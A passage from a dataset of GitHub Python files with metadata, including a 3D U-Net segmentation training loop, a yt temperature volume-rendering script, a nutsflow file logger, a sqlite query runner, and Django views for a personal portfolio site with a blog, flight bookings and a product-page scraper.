',output_path)\nprint('pth_folder ---> ',pth_folder)\n\nif not os.path.exists(opt.output_dir): \n os.mkdir(opt.output_dir)\nif not os.path.exists(output_path): \n os.mkdir(output_path)\nif not os.path.exists(opt.pth_path): \n os.mkdir(opt.pth_path)\nif not os.path.exists(pth_folder): \n os.mkdir(pth_folder)\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = str(opt.GPU)\nlr = opt.lr\n\ncoor_list, GT_list, input_list = train_preprocess_lessMemory_seg(opt)\n\nnet_seg = SEG_Network_3D_Unet(UNet_type= 'TS_UNet3D',\n in_channels = 4,\n out_channels = 4,\n frame_num = opt.frame_num,\n final_sigmoid = True,\n f_maps = opt.f_maps)\n\nL1loss_function = torch.nn.L1Loss()\nL2loss_function = torch.nn.MSELoss()\nBCEloss_function = torch.nn.BCELoss()\nif torch.cuda.is_available():\n print('Using GPU.')\n net_seg.cuda()\n L1loss_function.cuda()\n L2loss_function.cuda()\n BCEloss_function.cuda()\n\n\noptimizer_seg = torch.optim.Adam(net_seg.parameters(), lr=opt.lr, betas=(opt.b1, 0.999))\n########################################################################################################################\n\ntime_start=time.time()\nprev_time = time.time()\n# print('train_im_list key -----> ',train_im_list.keys())\niteration_num = 0\nfor epoch in range(opt.epoch, opt.n_epochs):\n coor_list = shuffle_datasets_lessMemory(coor_list)\n # print('name list -----> ',name_list) \n for index in range(len(coor_list)):\n per_coor = coor_list[index]\n train_im_name = per_coor['name']\n init_w = per_coor['init_w']\n init_h = per_coor['init_h']\n GT_im = GT_list[train_im_name]\n input_im = input_list[train_im_name]\n\n # print('GT_im -----> ',GT_im.shape)\n # print('input_im -----> ',input_im.shape)\n GT_patch = GT_im[:, init_w:init_w+opt.img_w, init_h:init_h+opt.img_h]\n input_patch = input_im[:, init_w:init_w+opt.img_w, init_h:init_h+opt.img_h].copy()\n\n rand_bg = np.random.randint(0, 100)\n rand_gama = np.random.randint(1000, 5000)/1000\n input_patch = (input_patch+rand_bg)/rand_gama\n\n GT_patch = torch.from_numpy(GT_patch.astype(np.float32))\n GT_patch = torch.from_numpy(np.expand_dims(np.expand_dims(GT_patch,0),0)).cuda()\n input_patch = torch.from_numpy(input_patch.astype(np.float32))\n input_patch = torch.from_numpy(np.expand_dims(np.expand_dims(input_patch,0),0)).cuda()\n # print('input_patch -----> ',input_patch.shape)\n # print('GT_patch -----> ',GT_patch.shape)\n GT_patch = FFDrealign4(GT_patch).cuda()\n input_patch = FFDrealign4(input_patch).cuda()\n\n # print('input_patch -----> ',input_patch.shape)\n pred_patch = net_seg(input_patch)\n # print('pred_patch -----> ',pred_patch.shape)\n\n optimizer_seg.zero_grad()\n # L1Loss_A2B = L1loss_function(train_imB, pred_imA)\n BCELoss_B2A_SDNN = BCEloss_function(pred_patch, GT_patch)\n L2Loss_B2A_SDNN = L2loss_function(pred_patch, GT_patch)\n loss_SDNN = BCELoss_B2A_SDNN+L2Loss_B2A_SDNN\n loss_SDNN.backward()\n optimizer_seg.step()\n\n iteration_num = iteration_num +1\n ################################################################################################################\n batches_done = epoch * opt.train_datasets_size + index\n batches_left = opt.n_epochs * opt.train_datasets_size - batches_done\n time_left = datetime.timedelta(seconds=batches_left * (time.time() - prev_time))\n prev_time = time.time()\n ################################################################################################################ 8_HCC20\n if (index%1000 == 0):\n time_end=time.time()\n print('time cost',time_end-time_start,'s')\n sys.stdout.write(\"\\r[Epoch %d/%d] [Batch 
%d/%d] ETA: %s\"\n % (epoch, opt.n_epochs, index, opt.train_datasets_size, time_left ))\n print(' loss_SDNN ',loss_SDNN.cpu().detach().numpy())\n print('iteration_num ',iteration_num)\n print(GT_patch.cpu().detach().numpy().max(),' ---> ', GT_patch.cpu().detach().numpy().min(),' ---> ',\\\n pred_patch.cpu().detach().numpy().max(),' ---> ', pred_patch.cpu().detach().numpy().min(),' ---> ',\\\n input_patch.cpu().detach().numpy().max(),' ---> ', input_patch.cpu().detach().numpy().min())\n\n # if (index%50 == 0): # or ((epoch+1)%1 == 0):\n if (iteration_num+1)%1000 == 0:\n print('save image')\n train_im_name = per_coor['name']\n input_output_path = output_path + '/input'\n pred_output_path = output_path + '/pred'\n GT_output_path = output_path + '/GT'\n\n if not os.path.exists(input_output_path): \n os.mkdir(input_output_path)\n if not os.path.exists(pred_output_path): \n os.mkdir(pred_output_path)\n if not os.path.exists(GT_output_path): \n os.mkdir(GT_output_path)\n\n input_patch_realign = inv_FFDrealign4(input_patch)\n input_patch_realign = input_patch_realign.cpu().detach().numpy()\n pred_patch_realign = inv_FFDrealign4(pred_patch)\n pred_patch_realign = pred_patch_realign.cpu().detach().numpy()\n GT_patch_realign = inv_FFDrealign4(GT_patch)\n GT_patch_realign = GT_patch_realign.cpu().detach().numpy()\n\n input_patch_realign = input_patch_realign.squeeze().astype(np.float32)*opt.normalize_factor\n pred_patch_realign = pred_patch_realign.squeeze().astype(np.float32)*opt.normalize_factor\n GT_patch_realign = GT_patch_realign.squeeze().astype(np.float32)*opt.normalize_factor\n\n input_patch_realign = np.clip(input_patch_realign, 0, 65535).astype('uint16')\n pred_patch_realign = np.clip(pred_patch_realign, 0, 65535).astype('uint16')\n GT_patch_realign = np.clip(GT_patch_realign, 0, 65535).astype('uint16')\n\n input_name = input_output_path + '/' + str(epoch) + '_' + str(index) + '_' + train_im_name+'_input.tif'\n pred_name = pred_output_path + '/' + str(epoch) + '_' + str(index) + '_' + train_im_name+'_pred.tif'\n GT_name = GT_output_path + '/' + str(epoch) + '_' + str(index) + '_' + train_im_name+'_GT.tif'\n\n io.imsave(input_name, input_patch_realign)\n io.imsave(pred_name, pred_patch_realign)\n io.imsave(GT_name, GT_patch_realign)\n\n if (epoch+1)%1 == 0:\n torch.save(net_seg.state_dict(), pth_folder + '//seg_' + str(epoch) + '.pth')\n\n\n\n\n\n","repo_name":"yuanlong-o/Deep_widefield_cal_inferece","sub_path":"DeepWonder/train_SEG_model.py","file_name":"train_SEG_model.py","file_ext":"py","file_size_in_byte":9758,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"42"} +{"seq_id":"31478300234","text":"#!/usr/bin/env python\nimport matplotlib\nmatplotlib.use('Agg')\nimport os\nimport sys\nimport numpy as np\nimport yt\nyt.enable_parallelism()\n\n#dir = '/home/ychen/data/0only_0529_h1/'\ndir = '/d/d11/ychen/MHD_jet/0517_L45_M10_b1_h1_20Myr'\ntry:\n ind = int(sys.argv[1])\n ts = yt.DatasetSeries(os.path.join(dir,'*_hdf5_plt_cnt_%02d?0' % ind), parallel=10)\nexcept IndexError:\n ts = yt.DatasetSeries(os.path.join(dir,'*_hdf5_plt_cnt_???0'), parallel=10)\n\n\nfiguredir = os.path.join(dir, 'volume_rendering_temperature_clip4')\nannotateddir = os.path.join(figuredir, 'annotated')\ntfdir = os.path.join(figuredir, 'transfer_function')\n\nif yt.is_root():\n for subdir in [figuredir, tfdir, annotateddir]:\n if not os.path.exists(subdir):\n os.mkdir(subdir)\n\n#fname = '/home/ychen/d9/FLASH4/stampede/0529_L45_M10_b1_h1/MHD_Jet_hdf5_plt_cnt_0620'\n#ds = 
yt.load(fname)\n\nbounds = (2e7, 3e9)\n\n# Since this rendering is done in log space, the transfer function needs\n# to be specified in log space.\ntf = yt.ColorTransferFunction(np.log10(bounds))\n\ntf.sample_colormap(np.log10(2E9), 0.005, alpha=0.1, colormap=\"arbre\")\n#tf.sample_colormap(np.log10(1E9), 0.005, alpha=0.5, colormap=\"arbre\")\n#tf.sample_colormap(np.log10(6E8), 0.005, alpha=0.1, colormap=\"arbre\")\ntf.sample_colormap(np.log10(7.5E8), 0.005, alpha=0.1, colormap=\"arbre\")\ntf.sample_colormap(np.log10(2.5E8), 0.005, alpha=0.1, colormap=\"arbre\")\ntf.sample_colormap(np.log10(1E8), 0.005, alpha=0.1, colormap=\"arbre\")\ntf.sample_colormap(np.log10(3.5E7), 0.005, alpha=0.01, colormap=\"arbre\")\n\nfor ds in ts.piter():\n sc = yt.create_scene(ds, field='temperature', lens_type='plane-parallel')\n\n render_source = sc.get_source(0)\n render_source.transfer_function = tf\n render_source.tfh.tf = tf\n render_source.tfh.bounds = bounds\n\n render_source.tfh.plot(tfdir+'/%s_render_transfer_function.png' % ds.basename,\n profile_field='density')\n\n cam = sc.add_camera(ds, lens_type='plane-parallel')\n cam.resolution = (1920, 1080)\n cam.width = ds.arr([100,56.25,56.25], 'kpc')\n cam.position = ds.arr([50, 0, 0], 'kpc')\n cam.switch_orientation(normal_vector=[-1, 0, 0], north_vector=[0, 1, 0])\n\n sc.render()\n\n\n # save an annotated version of the volume rendering including a representation\n # of the transfer function and a nice label showing the simulation time.\n text_string = \"T = {:6.2f} Myr\".format(float(ds.current_time.to('Myr')))\n #text_kwargs = {'color': 'grey'}\n sc.save_annotated(annotateddir+'/'+ds.basename, sigma_clip=4,\n text_annotate=[[(0.05, 0.9), text_string]])\n\n\n #sc.save(figuredir+'/'+ds.basename, sigma_clip=4.0)\n sc.save(figuredir+'/'+ds.basename, sigma_clip=4)\n\n","repo_name":"yihaochen/FLASHtools","sub_path":"render/yt_render_temperature.py","file_name":"yt_render_temperature.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"74555827005","text":"\"\"\"\n.. module:: logger\n :synopsis: Data logging\n\"\"\"\n\nimport os\nimport numpy as np\nfrom warnings import warn\nfrom nutsflow import NutFunction\nfrom nutsflow.common import as_tuple\n\n\nclass LogToFile(NutFunction):\n \"\"\"\n Log columns of data to file.\n \"\"\"\n\n def __init__(self, filepath, cols=None, colnames=None, reset=True,\n delimiter=','):\n \"\"\"\n Construct logger.\n\n >>> from __future__ import print_function\n >>> from nutsflow import Consume\n >>> filepath = 'tests/data/temp_logfile.csv'\n >>> data = [[1, 2], [3, 4]]\n\n >>> with LogToFile(filepath) as logtofile:\n ... data >> logtofile >> Consume()\n >>> print(open(filepath).read())\n 1,2\n 3,4\n \n\n >>> logtofile = LogToFile(filepath, cols=(1, 0), colnames=['a', 'b'])\n >>> data >> logtofile >> Consume()\n >>> print(open(filepath).read())\n a,b\n 2,1\n 4,3\n \n >>> logtofile.close()\n >>> logtofile.delete()\n\n :param string filepath: Path to file to write log to.\n :param int|tuple|None cols: Indices of columns of input data to write.\n None: write all columns\n int: only write the single given column\n tuple: list of column indices\n :param tuple|None colnames: Column names to write in first line.\n If None no colnames are written.\n :param bool reset: If True the writing to the log file is reset\n if the logger is recreated. 
Otherwise log data is appended\n to the log file.\n :param str delimiter: Delimiter for columns in log file.\n \"\"\"\n self.cols = cols\n self.reset = reset\n self.delim = delimiter\n self.filepath = filepath\n self.f = open(filepath, 'w' if self.reset else 'a')\n if colnames:\n self._writerow(colnames)\n\n def _writerow(self, row):\n \"\"\"Write row as string to log file and flush\"\"\"\n self.f.write(self.delim.join(map(str, row)))\n self.f.write('\\n')\n self.f.flush()\n\n def __call__(self, x):\n \"\"\"\n Log x\n\n :param any x: Any type of data.\n Special support for numpy arrays.\n :return: Return input unchanged\n :rtype: Same as input\n \"\"\"\n if isinstance(x, np.ndarray):\n row = x.tolist() if x.ndim else [x.item()]\n else:\n row = x\n if not self.cols is None:\n row = [row[i] for i in as_tuple(self.cols)]\n self._writerow(row)\n return x\n\n def delete(self):\n \"\"\"Delete log file\"\"\"\n self.close()\n os.remove(self.filepath)\n\n def close(self):\n \"\"\"Implementation of context manager API\"\"\"\n self.f.close()\n\n def __enter__(self):\n \"\"\"Implementation of context manager API\"\"\"\n\n return self\n\n def __exit__(self, *args):\n \"\"\"Implementation of context manager API\"\"\"\n self.close()\n\n\nclass LogCols(LogToFile):\n def __init__(self, filepath, cols=None, colnames=None, reset=True,\n delimiter=','):\n LogToFile.__init__(self, filepath, cols, colnames, reset, delimiter)\n warn('LogCols is deprecated. Use LogToFile!', DeprecationWarning)\n","repo_name":"maet3608/nuts-ml","sub_path":"nutsml/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"42"} +{"seq_id":"71777279168","text":"# Connect to the database\nimport sqlite3\nconn = sqlite3.connect('student_db.db')\ncursor = conn.cursor()\n\n# Open and read the contents of query_1.sql\nwith open('query_10.sql', 'r') as file:\n sql = file.read()\n\n# Execute the query\ncursor.execute(sql)\n\n# Fetch and print the results\nresults = cursor.fetchall()\nfor row in results:\n print(row)\n\n# Close the connection\nconn.close()","repo_name":"SergiiOshmarin/Web-2.0--Homework-Six","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"43527611933","text":"from django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.urls import reverse\nfrom .forms import *\nfrom .models import *\nfrom django.shortcuts import render\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n\n\ndef home_base(request):\n return render(request, 'portfolio/base/home_base.html')\n\n\n# Cadeiras-------------------------------------------------\n@login_required\ndef criar_cadeira_educacao(request):\n if request.method == 'POST':\n form = CadeiraForm(request.POST, request.FILES)\n if form.is_valid():\n cadeira = form.save()\n return redirect('portifolio:detalhes_cadeira_educacao', pk=cadeira.pk)\n else:\n form = CadeiraForm()\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/criar_cadeira_educacao.html', {'form': form})\n\n\n@login_required\ndef editar_cadeira_educacao(request, pk):\n cadeira = get_object_or_404(Cadeira, pk=pk)\n if request.method == 'POST':\n form = CadeiraForm(request.POST, 
instance=cadeira)\n if form.is_valid():\n form.save()\n return redirect('portifolio:detalhes_cadeira_educacao', pk=cadeira.pk)\n else:\n form = CadeiraForm(instance=cadeira)\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/editar_cadeira_educacao.html',\n {'form': form, 'cadeira': cadeira})\n\n\n@login_required\ndef apagar_cadeira_educacao(request, pk):\n cadeira = get_object_or_404(Cadeira, pk=pk)\n if request.method == 'POST':\n cadeira.delete()\n return redirect('portifolio:home_educacao')\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/apagar_cadeira_educacao.html',\n {'cadeira': cadeira})\n\n\ndef detalhes_cadeira_educacao(request, pk):\n cadeira = get_object_or_404(Cadeira, pk=pk)\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/detalhes_cadeira_educacao.html',\n {'cadeira': cadeira})\n\n\n# Educação-------------------------------------------------\ndef home_educacao(request):\n cadeiras = Cadeira.objects.all()\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/home_educacao.html', {'cadeiras': cadeiras})\n\n\ndef login_educacao(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:home_educacao')\n else:\n # aqui\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/login_educacao.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/login_educacao.html')\n\n\ndef logout_educacao(request):\n logout(request)\n return redirect('portifolio:home_educacao')\n\n\n# Tarefas----------------------------------------------------\ndef home_tarefa(request):\n topicos = ['HTML', 'Java', 'Kotlin', 'Python', 'Django', 'JavaScript', 'CSS']\n\n context = {\n 'topicos': topicos,\n 'tarefas': Tarefa.objects.all()\n }\n\n return render(request, 'portfolio/tarefas/home_tarefa.html', context)\n\n\ndef nova_tarefa(request):\n form = TarefaForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('portifolio:nova_tarefa')\n\n context = {'form': form}\n\n return render(request, 'portfolio/tarefas/nova_tarefa.html', context)\n\n\ndef edita_tarefa(request, tarefa_id):\n tarefa = Tarefa.objects.get(id=tarefa_id)\n form = TarefaForm(request.POST or None, instance=tarefa)\n\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portifolio:edita_tarefa', args=[tarefa_id]))\n\n context = {'form': form, 'tarefa_id': tarefa_id}\n return render(request, 'portfolio/tarefas/edita_tarefa.html', context)\n\n\ndef apaga_tarefa(request, tarefa_id):\n Tarefa.objects.get(id=tarefa_id).delete()\n return HttpResponseRedirect(reverse('portifolio:home_tarefa'))\n\n\n# Flight-------------------------------------------------\ndef flights_view(request):\n print(request.user.username)\n\n context = {\n 'flights': Flight.objects.all().order_by('origin')\n }\n return render(request, 'portfolio/flights/flights_view.html', context)\n\n\ndef flight_view(request, flight_id):\n flight = Flight.objects.get(id=flight_id)\n context = {\n 'flight': flight,\n 'passengers': flight.passengers.all(),\n 'no_passengers': Passenger.objects.exclude(flights__in=[flight])\n }\n\n return render(request, 'portfolio/flights/flight_view.html', context)\n\n\ndef passengers_view(request):\n form = PassengerForm(request.POST or None)\n if 
form.is_valid():\n form.save()\n\n context = {\n 'passengers': Passenger.objects.all().order_by('name'),\n 'form': PassengerForm(None),\n }\n return render(request, 'portfolio/flights/passengers_view.html', context)\n\n\ndef passenger_view(request, passenger_id):\n passenger = Passenger.objects.get(id=passenger_id)\n\n form = FlightForm(request.POST or None, instance=passenger)\n if form.is_valid():\n form.save()\n\n context = {\n 'passenger': passenger,\n 'form': form,\n }\n\n return render(request, 'portfolio/flights/passenger_view.html', context)\n\n\n@login_required\ndef add_passenger_view(request, flight_id):\n flight = Flight.objects.get(id=flight_id)\n\n if request.method == 'POST':\n passenger = Passenger.objects.get(id=request.POST['passenger'])\n flight.passengers.add(passenger)\n\n return redirect('portifolio:flight', flight_id=flight_id)\n\n\n@login_required\ndef remove_passenger_view(request, flight_id, passenger_id):\n flight = Flight.objects.get(id=flight_id)\n passenger = Passenger.objects.get(id=passenger_id)\n\n flight.passengers.remove(passenger)\n\n return redirect('portifolio:flights', flight_id=flight_id)\n\n\ndef login_flight(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:flights')\n else:\n return render(request, 'portfolio/flights/login_flight.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/flights/login_flight.html')\n\n\ndef logout_flight(request):\n logout(request)\n return redirect('portifolio:flights')\n\n\n# Sobre mim---------------------------------------------\ndef sobreMim_full(request):\n return render(request, 'portfolio/sobreMim/sobreMim_full.html')\n\n\ndef sobreMim_video(request):\n return render(request, 'portfolio/sobreMim/sobreMim_licencituras_folder/sobreMim_video.html')\n\n\ndef novo_sobreMim(request):\n form = SobreMimForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('portifolio:novo_sobreMim')\n\n context = {'form': form}\n\n return render(request, 'portfolio/sobreMim/sobreMim_licencituras_folder/sobreMim_nova_2.html', context)\n\n\ndef edita_sobreMim(request, sobreMim_id):\n sobreMim = SobreMim.objects.get(id=sobreMim_id)\n form = SobreMimForm(request.POST or None, instance=sobreMim)\n\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portifolio:edita_sobreMim', args=[sobreMim_id]))\n\n context = {'form': form, 'sobreMim_id': sobreMim_id}\n return render(request, 'portfolio/sobreMim/sobreMim_licencituras_folder/sobreMim_edita_2.html', context)\n\n\ndef apaga_sobreMim(request, sobreMim_id):\n SobreMim.objects.get(id=sobreMim_id).delete()\n return HttpResponseRedirect(reverse('portifolio:sobreMim_educacao'))\n\n\n# Blog-------------------------------------------\n@login_required\ndef add_categoria_blog(request):\n if request.method == 'POST':\n form = CategoriaForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('portifolio:home_blog_full')\n else:\n form = CategoriaForm()\n context = {\n 'form': form\n }\n return render(request, 'portfolio/blog/blog_template_folder/add_categoria_blog.html', context)\n\n\n@login_required\ndef add_artigo_blog(request):\n if request.method == 'POST':\n form = ArtigoForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return 
redirect('portifolio:home_blog_full')\n else:\n form = ArtigoForm()\n context = {\n 'form': form\n }\n return render(request, 'portfolio/blog/blog_template_folder/add_artigo_blog.html', context)\n\n\n@login_required\ndef editar_categoria_blog(request, categoria_id):\n categoria = get_object_or_404(Categoria, id=categoria_id)\n if request.method == 'POST':\n form = CategoriaForm(request.POST, request.FILES, instance=categoria)\n if form.is_valid():\n form.save()\n return redirect('portifolio:home_blog_full')\n else:\n form = CategoriaForm(instance=categoria)\n context = {\n 'form': form\n }\n return render(request, 'portfolio/blog/blog_template_folder/editar_categoria_blog.html', context)\n\n\n@login_required\ndef editar_artigo_blog(request, artigo_id):\n artigo = get_object_or_404(Artigo, id=artigo_id)\n if request.method == 'POST':\n form = ArtigoForm(request.POST, request.FILES, instance=artigo)\n if form.is_valid():\n form.save()\n return redirect('portifolio:home_blog_full')\n else:\n form = ArtigoForm(instance=artigo)\n context = {\n 'form': form\n }\n return render(request, 'portfolio/blog/blog_template_folder/editar_artigo_blog.html', context)\n\n\n@login_required\ndef apagar_categoria_blog(request, categoria_id):\n categoria = get_object_or_404(Categoria, id=categoria_id)\n if request.method == 'POST':\n categoria.delete()\n return redirect('portifolio:home_blog_full')\n context = {\n 'categoria': categoria\n }\n return render(request, 'portfolio/blog/blog_template_folder/apagar_categoria_blog.html', context)\n\n\n@login_required\ndef apagar_artigo_blog(request, artigo_id):\n artigo = get_object_or_404(Artigo, id=artigo_id)\n if request.method == 'POST':\n artigo.delete()\n return redirect('portifolio:home_blog_full')\n context = {\n 'artigo': artigo\n }\n return render(request, 'portfolio/blog/blog_template_folder/apagar_artigo_blog.html', context)\n\n\ndef categorias_blog(request):\n categorias = Categoria.objects.all()\n context = {\n 'categorias': categorias\n }\n return render(request, 'portfolio/blog/blog_template_folder/categorias_blog.html', context)\n\n\ndef categoria_blog(request, categoria_id):\n categoria = get_object_or_404(Categoria, id=categoria_id)\n artigos = categoria.artigos.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n\n context = {\n 'categoria': categoria,\n 'artigos': artigos,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n\n }\n return render(request, 'portfolio/blog/blog_template_folder/categoria_blog.html', context)\n\n\ndef artigos_blog(request):\n categorias = Categoria.objects.all()\n artigos = Artigo.objects.all()\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos': artigos,\n 'autores': autores\n }\n return render(request, 'portfolio/blog/blog_template_folder/artigos_blog.html', context)\n\n\ndef artigo_blog(request, artigo_id):\n artigo = get_object_or_404(Artigo, id=artigo_id)\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores,\n 'artigo': artigo\n }\n return render(request, 'portfolio/blog/blog_template_folder/artigo_blog.html', context)\n\n\ndef home_blog_full(request):\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': 
artigos_destaque,\n 'autores': autores\n }\n return render(request, 'portfolio/blog/blog_template_folder/home_blog_full.html', context)\n\n\ndef login_blog(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:home_blog_full')\n else:\n # aqui\n return render(request, 'portfolio/blog/blog_template_folder/login_blog.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/blog/blog_template_folder/login_blog.html')\n\n\ndef logout_blog(request):\n logout(request)\n return redirect('portifolio:home_blog_full')\n\n\n# Programação Web------------------------------------\ndef web_home_full(request):\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n }\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_home_full.html', context)\n\n\ndef web_laboratorios(request):\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n }\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/web_laboratorios.html',\n context)\n\n\ndef web_javaScript_playground(request):\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n }\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_javaScript_playground.html', context)\n\n\ndef web_scrapping(request):\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_scrapping.html')\n\n\ndef index_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/index.html')\n\n\ndef info_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/info.html')\n\n\ndef local_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/local.html')\n\n\ndef multimidia_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/multimedia.html')\n\n\ndef quizz_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/quizz.html')\n\n\ndef html_css_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/html5-css.html')\n\n\ndef index_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/indexNovo.html')\n\n\ndef sec2_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec2.html')\n\n\ndef sec3_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec3.html')\n\n\ndef sec4_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec4.html')\n\n\ndef sec5_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec5.html')\n\n\ndef sec6_lab_3(request):\n return render(request,\n 
'portfolio/sobreMim/web_laboratorios_folder/lab3/sec6.html')\n\n\ndef index_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/indexNovo2.html')\n\n\ndef animacoes_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/animacoes.html')\n\n\ndef imagensResponsivas_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/ImagensResponsivas.html')\n\n\ndef paralax_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/paralax.html')\n\n\ndef sec2_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec2.html')\n\n\ndef sec3_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec3.html')\n\n\ndef sec4_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec4.html')\n\n\ndef sec5_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec5.html')\n\n\ndef sec6_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec6.html')\n\n\ndef svg_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/svg.html')\n\n\ndef videoBackground_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/videoBackground.html')\n\n\ndef web_calculator(request):\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_calculator.html')\n\n\ndef web_tecnologias_existentes(request):\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_tecnologias_existentes.html')\n\n\ndef web_video_tecnico(request):\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_video_tecnico.html')\n\n\ndef scraping_previsao_tempo(request):\n url = \"https://www.amazon.com/Sony-Playstation-VR-Marvels-Bundle/dp/B0B2WDLQQP/ref=pd_vtp_h_pd_vtp_h_sccl_3/137\" \\\n \"-0687099-4683901?pd_rd_w=o5N1a&content-id=amzn1.sym.e16c7d1a-0497-4008-b7be-636e59b1dfaf&pf_rd_p=e16c7d1a\" \\\n \"-0497-4008-b7be-636e59b1dfaf&pf_rd_r=YGYYMGMEE008NDP7NAR0&pd_rd_wg=8WZL2&pd_rd_r=93cc9a11-9c74-499a-8f26\" \\\n \"-9d4ed6268991&pd_rd_i=B0B2WDLQQP&psc=1\"\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/114.0.0.0 Safari/537.36\",\n \"Accept-Language\": \"en\",\n }\n r = requests.get(url, headers=headers)\n soup = BeautifulSoup(r.text, \"lxml\")\n\n name = soup.select_one(selector=\"#productTitle\").getText()\n name = name.strip()\n print(name)\n\n price = soup.select_one(selector=\"#price_inside_buybox\").getText()\n\n print(price)\n\n context = {\n 'name': name,\n 'price': price\n }\n\n # Renderize o template HTML com os dados obtidos\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/scraping_previsao_tempo.html', context)\n\n\n# Formulário de contacto---------------------------------\ndef contacto_full(request):\n if request.method == 'POST':\n form = ContatoForm(request.POST)\n if form.is_valid():\n nome = form.cleaned_data['nome']\n email = form.cleaned_data['email']\n telefone = 